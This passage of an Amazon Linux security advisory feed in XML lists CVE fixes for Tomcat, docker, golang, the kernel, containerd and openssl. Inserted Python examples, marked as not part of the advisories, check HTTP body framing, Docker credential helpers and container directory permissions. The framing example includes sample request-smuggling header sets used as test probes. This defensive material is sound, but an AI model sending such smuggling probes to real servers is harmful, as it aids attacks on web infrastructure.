arch="noarch"><filename>Packages/tomcat7-log4j-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.109" release="1.41.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.109-1.41.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1535</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1535: medium priority package update for tomcat8</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-33037:
Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP transfer-encoding request header in some circumstances, leading to the possibility of request smuggling when used with a reverse proxy. Specifically: - Tomcat incorrectly ignored the transfer-encoding header if the client declared it would only accept an HTTP/1.0 response; - Tomcat honoured the identity encoding; and - Tomcat did not ensure that, if present, the chunked encoding was the final encoding.
1981533: CVE-2021-33037 tomcat: HTTP request smuggling when used with a reverse proxy
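The three parsing mistakes listed for CVE-2021-33037 come down to one rule: an origin server must derive the body length from Transfer-Encoding exactly as the reverse proxy in front of it does, or refuse the request. The Python below is an added example, not Tomcat's code and not part of this advisory; it makes a strict framing decision from a request's version and header map following RFC 7230 section 3.3.3. Treating Transfer-Encoding on a non-HTTP/1.1 request as a rejection is a design choice assumed here (silently ignoring the header is what made the first bug exploitable); the function and class names and the probe header sets are the example's own.

```python
"""Strict HTTP/1.1 body framing (added example; not Tomcat's code)."""

from typing import Dict, List, Optional, Tuple


class FramingError(ValueError):
    """The request must be answered with 400 and the connection closed."""


def parse_transfer_encoding(value: str) -> List[str]:
    """Split a Transfer-Encoding list into lower-cased codings, dropping parameters."""
    codings = []
    for element in value.split(","):
        element = element.strip()
        if element:  # RFC 7230 section 7 allows empty list elements; skip them
            codings.append(element.split(";", 1)[0].strip().lower())
    return codings


def body_framing(version: str, headers: Dict[str, str]) -> Tuple[str, Optional[int]]:
    """Decide how the request body is delimited.

    Returns ("chunked", None), ("content-length", n) or ("none", 0).
    Any framing that a proxy and an origin could read differently is
    rejected, because that disagreement is what request smuggling exploits.
    """
    norm = {name.lower(): value for name, value in headers.items()}
    te = norm.get("transfer-encoding")
    cl = norm.get("content-length")

    if te is not None:
        # Bug 1 in the advisory: never silently drop Transfer-Encoding based on
        # the protocol version the client claims. Rejecting is the safe choice.
        if version != "HTTP/1.1":
            raise FramingError("Transfer-Encoding on a non-HTTP/1.1 request")
        codings = parse_transfer_encoding(te)
        if not codings:
            raise FramingError("empty Transfer-Encoding")
        # Bug 2: "identity" is not a transfer coding in HTTP/1.1 (RFC 7230 removed it).
        if "identity" in codings:
            raise FramingError("identity is not a valid transfer coding")
        # Bug 3: chunked must be present and must be the final coding, otherwise
        # the body length cannot be determined.
        if codings[-1] != "chunked":
            raise FramingError("chunked must be the final transfer coding")
        if codings.count("chunked") > 1:
            raise FramingError("chunked applied more than once")
        if cl is not None:
            # RFC 7230 says Transfer-Encoding wins, but at a trust boundary it is
            # safer to reject than to guess which header the proxy believed.
            raise FramingError("both Transfer-Encoding and Content-Length present")
        return ("chunked", None)

    if cl is not None:
        if not cl.isdigit():
            raise FramingError("malformed Content-Length")
        return ("content-length", int(cl))

    return ("none", 0)


def is_rejected(version: str, headers: Dict[str, str]) -> bool:
    """True if body_framing() refuses the request."""
    try:
        body_framing(version, headers)
    except FramingError:
        return True
    return False


if __name__ == "__main__":
    # Constructed header sets: one smuggling probe per advisory bullet, plus a clean request.
    probes = [
        ("HTTP/1.0", {"Transfer-Encoding": "chunked", "Content-Length": "5"}),
        ("HTTP/1.1", {"Transfer-Encoding": "identity", "Content-Length": "5"}),
        ("HTTP/1.1", {"Transfer-Encoding": "chunked, gzip"}),
        ("HTTP/1.1", {"Transfer-Encoding": "gzip, chunked"}),
    ]
    for version, headers in probes:
        verdict = "rejected" if is_rejected(version, headers) else "accepted"
        print(version, headers, verdict)
```

The rejection of a request carrying both headers is stricter than the RFC requires; it is the right default for an origin sitting behind a proxy whose own precedence rule you do not control.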
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33037" title="" id="CVE-2021-33037" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-el-3.0-api" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.69" release="1.88.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-webapps-8.5.69-1.88.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1536</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1536: important priority package update for ca-certificates</title><issued date="2021-09-30 20:41:00" /><updated date="2021-10-04 22:24:00" /><severity>important</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ca-certificates" version="2018.2.22" release="65.1.24.amzn1" epoch="0" arch="noarch"><filename>Packages/ca-certificates-2018.2.22-65.1.24.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1537</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1537: medium priority package update for docker</title><issued date="2021-09-30 19:22:00" /><updated date="2021-10-04 22:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-41092:
CVE-2021-41092 docker:
A bug was found in the Docker CLI where running docker login my-private-registry.example.com with a misconfigured configuration file (typically ~/.docker/config.json) listing a credsStore or credHelpers that could not be executed would result in any provided credentials being sent to registry-1.docker.io rather than the intended private registry.
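The failure mode in CVE-2021-41092 is silent: the helper named in credsStore or credHelpers cannot be executed, and the CLI carries on with the default registry. The Python below is an added example, not part of the Docker project or of this advisory; it resolves each configured helper the way the CLI does (the executable is docker-credential- followed by the configured name, looked up on PATH) and reports any that cannot run, so the check can be made before docker login on an unpatched client. The helper name "example", the registry hostnames and the config.json contents in the demo are constructed.

```python
"""Verify that Docker credential helpers named in config.json can actually run (added example)."""

import json
import os
import shutil
import stat
import tempfile
from typing import Dict, List, Optional


def helper_binary(name: str, path: Optional[str] = None) -> Optional[str]:
    """Resolve a credsStore/credHelpers value to its docker-credential-NAME executable.

    The docker CLI invokes helpers by prefixing the configured name with
    'docker-credential-' and searching PATH; passing path= lets the check run
    against a constructed PATH.
    """
    return shutil.which("docker-credential-" + name, path=path)


def check_credential_config(config: Dict, path: Optional[str] = None) -> List[str]:
    """Return one problem string per configured helper that could not be executed.

    Before the fix for CVE-2021-41092 a helper that failed to run made
    'docker login my-private-registry.example.com' send the supplied
    credentials to registry-1.docker.io instead, so every entry reported
    here is a credential-leak risk on an unpatched CLI.
    """
    problems = []
    store = config.get("credsStore")
    if store and helper_binary(store, path) is None:
        problems.append("credsStore %r: docker-credential-%s is not executable on PATH"
                        % (store, store))
    for registry, helper in (config.get("credHelpers") or {}).items():
        if helper_binary(helper, path) is None:
            problems.append("credHelpers[%r] = %r: docker-credential-%s is not executable on PATH"
                            % (registry, helper, helper))
    return problems


def check_config_file(config_path: str, path: Optional[str] = None) -> List[str]:
    """Load a config.json and check it; an absent file configures no helpers."""
    if not os.path.exists(config_path):
        return []
    with open(config_path, "r", encoding="utf-8") as fh:
        return check_credential_config(json.load(fh), path)


def demo() -> Dict[str, List[str]]:
    """Run the check against a constructed PATH that holds one fake helper."""
    results = {}
    with tempfile.TemporaryDirectory() as bindir:
        fake = os.path.join(bindir, "docker-credential-example")
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")  # constructed stand-in for a real helper
        os.chmod(fake, stat.S_IRWXU)
        good = {"credsStore": "example", "credHelpers": {"ghcr.io": "example"}}
        bad = {"credsStore": "missing", "credHelpers": {"registry.internal.example": "absent"}}
        results["good"] = check_credential_config(good, path=bindir)
        results["bad"] = check_credential_config(bad, path=bindir)
    return results


if __name__ == "__main__":
    for problem in check_config_file(os.path.expanduser("~/.docker/config.json")):
        print("WARNING:", problem)
    print(demo())
```

Run it as the same user and with the same PATH that will run docker login; a helper that resolves for root but not for the CI user is exactly the misconfiguration the bug punished.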
CVE-2021-41091:
CVE-2021-41091 docker:
A bug was found in Moby (Docker Engine) where the data directory (typically /var/lib/docker) contained subdirectories with insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as setuid), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files.
CVE-2021-41089:
CVE-2021-41089 docker:
A bug was found in Moby (Docker Engine) where attempting to copy files using docker cp into a specially-crafted container can result in Unix file permission changes for existing files in the host's filesystem, widening access to others. This bug does not directly allow files to be read, modified, or executed without an additional cooperating process.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41089" title="" id="CVE-2021-41089" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41091" title="" id="CVE-2021-41091" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41092" title="" id="CVE-2021-41092" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="20.10.7" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-20.10.7-3.71.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="20.10.7" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-20.10.7-3.71.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1538</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1538: medium priority package update for golang</title><issued date="2021-09-30 19:24:00" /><updated date="2021-10-04 22:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-36221:
A race condition flaw was found in Go. An incoming request's body was not closed after the handler panicked, which could lead to a ReverseProxy crash. The highest threat from this vulnerability is to availability.
1995656: CVE-2021-36221 golang: net/http/httputil: panic due to racy read of persistConn after handler panic
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36221" title="" id="CVE-2021-36221" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-docs" version="1.15.15" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.15.15-1.71.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.15.15" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.15.15-1.71.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.15.15" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.15.15-1.71.amzn1.noarch.rpm</filename></package><package name="golang" version="1.15.15" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.15.15-1.71.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.15.15" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.15.15-1.71.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.15.15" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.15.15-1.71.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.15.15" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.15.15-1.71.amzn1.noarch.rpm</filename></package><package name="golang" version="1.15.15" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.15.15-1.71.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.15.15" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.15.15-1.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1539</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1539: important priority 
package update for kernel</title><issued date="2021-09-30 19:25:00" /><updated date="2025-02-27 23:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-28772:
An issue was discovered in the Linux kernel before 5.13.3. lib/seq_buf.c has a seq_buf_putmem_hex buffer overflow.
CVE-2022-20141:
In ip_check_mc_rcu of igmp.c, there is a possible use after free due to improper locking. This could lead to local escalation of privilege when opening and closing inet sockets with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-112551163. References: Upstream kernel.
CVE-2021-47309:
In the Linux kernel, the following vulnerability has been resolved:
net: validate lwtstate->data before returning from skb_tunnel_info()
CVE-2021-40490:
A flaw was found in the Linux kernel. A race condition was discovered in the ext4 subsystem. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-38205:
A flaw was found in the Linux kernel that allows attackers to defeat an ASLR protection mechanism because it prints a kernel pointer (i.e., the real IOMEM pointer). The highest threat from this vulnerability is to confidentiality.
CVE-2021-38204:
A flaw was found in the Linux kernel. A denial of service (use-after-free and panic) can be caused by a physically proximate attacker removing a MAX-3421 USB device in certain situations. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-38198:
A flaw was found in the Linux kernel, where it incorrectly computes the access permissions of a shadow page. This issue leads to a missing guest protection page fault.
CVE-2021-38160:
** DISPUTED ** In drivers/char/virtio_console.c in the Linux kernel before 5.13.4, data corruption or loss can be triggered by an untrusted device that supplies a buf->len value exceeding the buffer size. NOTE: the vendor indicates that the cited data corruption is not a vulnerability in any existing use case; the length validation was added solely for robustness in the face of anomalous host OS behavior.
CVE-2021-37576:
A flaw was found in the Linux kernel. On the PowerPC platform, a KVM guest OS user can cause host OS memory corruption via rtas_args.nargs. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-3753:
A race problem was found in vt_k_ioctl in drivers/tty/vt/vt_ioctl.c in the Linux kernel, which may cause an out-of-bounds read in vt because the write access to vc_mode is not protected by a lock in vt_ioctl (KDSETMDE). The highest threat from this vulnerability is to data confidentiality.
CVE-2021-3732:
A flaw was found in the Linux kernel's OverlayFS subsystem in the way the user mounts the TmpFS filesystem with OverlayFS. This flaw allows a local user to gain access to hidden files that should not be accessible.
CVE-2021-3679:
A flaw was found in the Linux kernel's tracing functionality: using the trace ring buffer in a specific way can exhaust CPU resources. Only privileged local users (with the CAP_SYS_ADMIN capability) could use this flaw to starve the system of resources, causing a denial of service.
CVE-2021-3655:
A vulnerability was found in the Linux kernel. Missing size validations on inbound SCTP packets may allow the kernel to read uninitialized memory.
CVE-2021-3609:
A flaw was found in the CAN BCM networking protocol in the Linux kernel, where a local attacker can abuse a flaw in the CAN subsystem to corrupt memory, crash the system or escalate privileges.
CVE-2021-35477:
A flaw in the Linux kernel allows a privileged BPF program to obtain sensitive information from kernel memory via a Speculative Store Bypass side-channel in the eBPF subsystem.
CVE-2021-22543:
A flaw was found in the Linux kernel's KVM implementation, where improper handling of the VM_IO|VM_PFNMAP VMAs in KVM bypasses RO checks and leads to pages being freed while still accessible by the VMM and guest. This flaw allows users who can start and control a VM to read/write random pages of memory, resulting in local privilege escalation. The highest threat from this vulnerability is to confidentiality, integrity, and system availability.
CVE-2020-16119:
A flaw was found in the Linux kernel. When reusing a socket with an attached dccps_hc_tx_ccid as a listener, the socket will be used after being released, leading to a denial of service (DoS) or potential code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16119" title="" id="CVE-2020-16119" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22543" title="" id="CVE-2021-22543" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35477" title="" id="CVE-2021-35477" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3609" title="" id="CVE-2021-3609" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3655" title="" id="CVE-2021-3655" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3679" title="" id="CVE-2021-3679" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3732" title="" id="CVE-2021-3732" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3753" title="" id="CVE-2021-3753" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37576" title="" id="CVE-2021-37576" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38160" title="" id="CVE-2021-38160" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38198" title="" id="CVE-2021-38198" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38204" title="" id="CVE-2021-38204" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38205" title="" id="CVE-2021-38205" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40490" title="" id="CVE-2021-40490" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-47309" title="" id="CVE-2021-47309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20141" title="" id="CVE-2022-20141" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28772" title="" id="CVE-2023-28772" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.248" release="129.473.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-devel-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.248-129.473.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1540</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1540: medium priority package update for containerd</title><issued date="2021-10-01 17:58:00" /><updated date="2021-10-04 22:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-41103:
CVE-2021-41103 containerd:
A bug was found in containerd where container root directories and some plugins had insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as setuid), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files.
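CVE-2021-41091 (docker, above) and CVE-2021-41103 (containerd, here) are the same defect in two daemons: a data directory that unprivileged users can traverse exposes every world-readable or setuid file in every container rootfs beneath it. What matters is reachability, not the mode of a single file, because a user needs execute permission on every directory on the path. The Python below is an added example, not code from either project or from this advisory; it walks a data directory, descends only into directories that others can traverse, and reports what a local unprivileged user could reach. The default root paths are assumed defaults, and the tree built by demo() is constructed to look like a pre-fix /var/lib/docker.

```python
"""Audit a container data directory for entries reachable by unprivileged users (added example)."""

import os
import stat
import tempfile
from typing import List, Tuple

# Default data directories for the two affected packages (assumed defaults;
# use the paths from your daemon configuration if they differ).
DEFAULT_ROOTS = ["/var/lib/docker", "/var/lib/containerd"]


def other_bits(mode: int) -> int:
    """The 'other' permission class: low three bits of the mode (r=4, w=2, x=1)."""
    return stat.S_IMODE(mode) % 8


def is_setuid(mode: int) -> bool:
    """True if the setuid bit (0o4000) is set."""
    return (stat.S_IMODE(mode) // 0o4000) % 2 == 1


def classify(st: os.stat_result) -> List[str]:
    """Explain how one entry widens access to users outside its owner and group."""
    findings = []
    other = other_bits(st.st_mode)
    if stat.S_ISDIR(st.st_mode):
        if other % 2 == 1:
            findings.append("directory traversable by others (o+x)")
        if other >= 4:
            findings.append("directory listable by others (o+r)")
    elif stat.S_ISREG(st.st_mode):
        if other >= 4:
            findings.append("file readable by others (o+r)")
        if (other // 2) % 2 == 1:
            findings.append("file writable by others (o+w)")
        if other % 2 == 1:
            findings.append("file executable by others (o+x)")
            if is_setuid(st.st_mode):
                findings.append("setuid file reachable and executable by others")
    return findings


def audit(root: str) -> List[Tuple[str, str]]:
    """Report (relative path, finding) for every entry a local unprivileged user could reach.

    Reachability needs o+x on every directory from root downwards, so a
    directory without it hides its whole subtree and is not descended into.
    Removing that bit from the data directory is what the fixed packages do.
    """
    findings = []
    root_st = os.lstat(root)
    for f in classify(root_st):
        findings.append((".", f))
    if not stat.S_ISDIR(root_st.st_mode) or other_bits(root_st.st_mode) % 2 == 0:
        return findings
    for dirpath, dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            for f in classify(os.lstat(full)):
                findings.append((os.path.relpath(full, root), f))
        traversable = []
        for name in dirnames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                continue  # symlinks are not followed; their targets are audited in place
            for f in classify(st):
                findings.append((os.path.relpath(full, root), f))
            if other_bits(st.st_mode) % 2 == 1:
                traversable.append(name)
        dirnames[:] = traversable  # prune subtrees nobody else can enter
    return findings


def demo() -> List[Tuple[str, str]]:
    """Audit a constructed tree shaped like a pre-fix /var/lib/docker."""
    with tempfile.TemporaryDirectory() as root:
        os.chmod(root, 0o711)  # pre-fix data directory mode: traversable, not listable
        private = os.path.join(root, "private")
        os.mkdir(private)
        os.chmod(private, 0o700)  # not traversable: nothing below may be reported
        with open(os.path.join(private, "secret"), "w") as fh:
            fh.write("constructed\n")
        os.chmod(os.path.join(private, "secret"), 0o644)
        current = root
        for part in ["overlay2", "abc", "merged", "usr", "bin"]:
            current = os.path.join(current, part)
            os.mkdir(current)
            os.chmod(current, 0o755)  # container rootfs layers are world-traversable
        suid = os.path.join(current, "passwd")
        with open(suid, "w") as fh:
            fh.write("constructed\n")
        os.chmod(suid, 0o4755)  # setuid binary inside the container image
        return sorted(audit(root))


if __name__ == "__main__":
    import sys
    roots = sys.argv[1:] or [r for r in DEFAULT_ROOTS if os.path.isdir(r)]
    for root in roots:
        for path, finding in audit(root):
            print(root, path, finding)
    if not roots:
        for path, finding in demo():
            print("demo", path, finding)
```

Run it as root so the walk itself is not blocked by permissions; the pruning models what an unprivileged user could reach, not what the auditor can read. A clean result after the update is an empty list for the data directory itself, since a 0700 root hides everything beneath it.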
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41103" title="" id="CVE-2021-41103" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd-stress" version="1.4.6" release="3.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.6-3.9.amzn1.x86_64.rpm</filename></package><package name="containerd-debuginfo" version="1.4.6" release="3.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.6-3.9.amzn1.x86_64.rpm</filename></package><package name="containerd" version="1.4.6" release="3.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.6-3.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1541</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1541: medium priority package update for openssl</title><issued date="2021-10-01 18:00:00" /><updated date="2021-10-04 22:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3712:
It was found that OpenSSL assumed ASN.1 strings to be NUL terminated. A malicious actor may be able to force an application into calling an OpenSSL function with a specially crafted, non-NUL-terminated string to deliberately hit this bug, which may result in a crash of the application (a denial of service) or possibly memory disclosure. The highest threat from this vulnerability is to data confidentiality and system availability.
1995634: CVE-2021-3712 openssl: Read buffer overruns processing ASN.1 strings
